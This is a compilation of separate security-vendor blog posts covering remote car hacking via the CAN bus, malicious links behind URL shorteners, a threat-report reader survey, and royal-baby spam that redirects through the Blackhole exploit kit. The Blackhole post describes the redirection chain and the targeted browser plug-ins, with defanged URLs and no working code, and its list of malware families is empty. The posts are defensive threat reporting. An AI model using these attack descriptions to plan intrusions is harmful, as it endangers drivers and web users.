When Car Hacking Turns Your Vehicle into a Video Game

image1_8.png
 

Modern cars contain a lot of nifty electronic gadgets, as well as more than one kilometer of cable wired to all kinds of sensors, processing units, and electronic control units. The cars themselves have become large computers, and as history shows, wherever there is a computer, there is someone trying to attack it. Over the past few years various studies have been conducted on how feasible it would be to attack a car through its onboard network. Most researchers focused on attacks with full physical access to the car, but some also explored external attack vectors.

If attackers have physical access to a car they can, for example, access the Controller Area Network (CAN) or the On-Board Diagnostic (OBD) system, but they can also perform other dangerous actions, such as physically tampering with the brakes or stealing the car. Digitally tampering with a car, on the other hand, might be much more difficult to prove after an accident. Such attacks could potentially be combined with other attacks that allow for a remote code execution and should be taken as a demonstration of payloads.

There are a few ways to get into a car’s system without having physical access to it, for example through tire pressure monitoring systems, traffic message channel (TMC) messages, or GSM and Bluetooth connections. Some manufacturers have started developing smartphone apps that can control some of the car's functionalities, which opens another possible attack vector. There have also been some cases where specially crafted music files on USB drives were able to hijack some of the car’s systems.

Charlie Miller and Chris Valasek, two researchers working on a project for DARPA, explored how far they could go by hacking the Controller Area Network once inside the car. The pre-released video of their presentation for the upcoming DEFCON conference shows that nearly all of the car's functions can be controlled or triggered including, switching off all lights, shutting down the engine, disabling the brakes, some limited steering, sounding the horn, and manipulating the system display. It doesn’t take much imagination to understand that this has the potential to cause serious accidents. Some of these changes could be made permanent and invisible with malicious firmware updates or system changes. Of course, a laptop with a modem in the glove box would work as well, but would not be as stealthy. If an attacker used the same method as the researchers, hopefully you would notice the attacker’s laptop on your backseat and wonder what was going on.

Car manufacturers are aware of these challenges and have been working on improving the security of car networks for years. Remote attack vectors, especially, need to be analyzed and protected against. At Symantec we are also monitoring this research field to help improve it in the future. Miller and Valasek’s research shows that cars can be an interesting target for attackers, but there are currently far bigger automobile-related risks than hackers taking over your car while driving. Personally, I’m more scared of people texting messages while driving and I assume they pose a far bigger risk than hackers when it comes to accidents, for now at least. Safe driving.

Short-URL Services May Hide Threats

In a recent post, AppAppeal ranked the most popular URL shorteners. The top five includes TinyURL, Goo.gl, Bit.ly, Ow.ly and is.gd. Unfortunately, these helpful services are also used to hide a large number of malicious URLs. This result has made me want to learn more about malicious links that may be hidden behind these shortcuts.

For the top five, the following table and graphs show the number of malicious URLs McAfee Labs discovered in 2012 and the first half of 2013.

FP_BLOG_130725_0

 

 

 

 

FP_BLOG_130725_1

 

In addition to the most commonly used URL shortening services, there are many others. Browsing the Internet, I soon discovered hundreds more.

The most common top-level domains for URL shorteners are COM, ME, LY, US, IN, NET, TO, IT, CC, and GD. But two-thirds of these sites are unreachable or lead you to web pages with advertising links indicating the domain name is for sale. Some others explain they had to close due to the amount of malicious URLs they hosted without being able to properly eliminate them.

FP_BLOG_130725_2

 

The final third is hard to examine. Some of them require registration to use the services, but most are still directly usable. Here are the URLs most targeted by malware in 2013, according to our research.

  • bit.ly
  • tinyurl.com
  • goo.gl
  • is.gd
  • adf.ly
  • y.ahoo.it
  • ow.ly
  • jmb.tw
  • 0845.com
  • tiny.cc

 

To protect Internet users, in 2010 McAfee introduced its own secure URL  shortener using the mcaf.ee domain. This service was designed to provide the web community with piece of mind knowing that any link referred to was secure, containing no malware and not pointing to a malicious site.

If you follow any mcaf.ee short URL, such as this one leading to the French CLUSIF association web page (hxxp://mcaf.ee/4yr1s), you will notice that a frame is added to the top of the destination page confirming its good ranking from Site Advisor. Here the check mark is green:

FP_BLOG_130725_3

But if you are redirected to a malicious URL, you will be stopped before it is too late.

FP_BLOG_130725_4

To create these short URLs, you can find add-ons at the Google Chrome Extension repository and at the Firefox add-on site. You may use these facilities knowing that McAfee will help keep you safe.

Internet Security Threat Report Readership Survey

Symantec’s Internet Security Threat Report (ISTR) is an annual report which provides an overview and in-depth analysis of the online security landscape over the previous year. The report is based on data from Symantec’s Global Intelligence Network, which Symantec analysts use to identify, analyze, and provide commentary on emerging trends in cyberattacks, malicious code activity, phishing, and spam as well as the wider threat landscape trends in general.

The latest release, ISTR volume 18, may be considered the most comprehensive and detailed to date. Among other findings, the report incorporated up-to-date data and analysis on targeted attacks, data breaches, malware, spam, vulnerabilities, and mobile malware.

Everyone in Symantec is extremely proud of the ISTR; however, this is no time to rest on our laurels. We are constantly looking to improve the quality of our products and services. This includes the ISTR. To that end, we would like to elicit the help of our readers with the first ever ISTR readership survey. Through engaging with the ISTR readership, we hope that we can better tailor future reports to suit your needs and wants.

For example, would you like to see more in the report on data breaches? Perhaps you want to see an even wider focus on targeted attacks? Now is your chance to tell us your preferences, which parts you enjoy, and which parts you may want to skip over. While we will always endeavor to provide you with the best information about the most pertinent threats, we want to know what this means to our individual readers and the businesses they may represent in order to better understand how the report is being used.

We also want to find out whether you would prefer to receive more frequent ISTR-style reports in addition to the annual publication. Now is your chance to share your thoughts on all things ISTR—as the saying goes, help us to help you.

You can be heard by completing our ISTR user survey. It is quick and easy to complete, and your contributions are invaluable to us as we strive to improve the quality of our output. We would also encourage you, if you can, to share the survey with as many of your ISTR reading friends or colleagues as possible.

Thanks for reading and for helping out. We look forward to collecting your responses and making the ISTR a more responsive, tailored, and user friendly report, and we hope that you will continue to enjoy reading the report well into the future.

Take the survey

The Dangers of a Royal Baby: Scams Abound

Big news stories are always an opportunity for scammers and spammers, who attempt to redirect users to malicious exploit kits or other unwanted services. Britain’s royal baby is the latest news to offer cover for malware. We have already found a lot of spam messages regarding the birth and baby that lead users to the infamous Blackhole exploit kit.

The initial infection arrives as spam mail that contains a redirection URL in the following format:

Royal_Baby_gift

Figure 1: Spam email.

  • hxxp://[infectedDomain]/[Random]/index.html

From there the user will land on a page with links to JavaScript files as in the next image:

Spam URL

Figure 2: Spam URL.

The first level contains the three *.js URLs that point to other infected/malicious domains. Once victims land on this page, the JavaScript files will lead them to a page like the following:

Blackhole Landing page redirector

Figure 3: Blackhole landing page redirector.

The second-level URL shows us the actual landing page of the Blackhole exploit kit, which leads us to this content:

customized encoded Blackhole Landing page

Figure 4: Customized encoded Blackhole landing page.

We have decoded the customized base64-encoded Blackhole landing page, which resulted in a “plug-in detect” JavaScript code. This is a piece of code used by Blackhole to identify which plug-ins are installed on the machine, so it can target the payload for the specific plug-in versions available in the user’s browser. The next image shows us the decoded PluginDetect.js:

Decode Blackhole Landing Page (plugindetect.js with malicious URL)

Figure 5: Decoded Blackhole landing page (PluginDetect.js with malicious URL).

The following browser plug-ins are known to be targeted by the exploit kit:

  • Java Runtime Environment
  • Adobe PDF Reader
  • Flash

McAfee coverage for the PluginDetect.js zero-day threat is JS/Exploit!JNLP.d.

The following images show the PDF and Java downloading a malicious URL:

JAVA_11

Figure 6: JAR file downloading the URL in PluginDetect.js.

PDF file download URL in plugindetect.js

Figure 7: PDF file downloading the URL in PluginDetect.js.

This chain redirection could leave victims infected with one of these malware families:

For more detail about the Blackhole exploit kit, please refer the McAfee Threat Advisory Library.

Thanks to my colleague Rohan Shah for his assistance with this blog.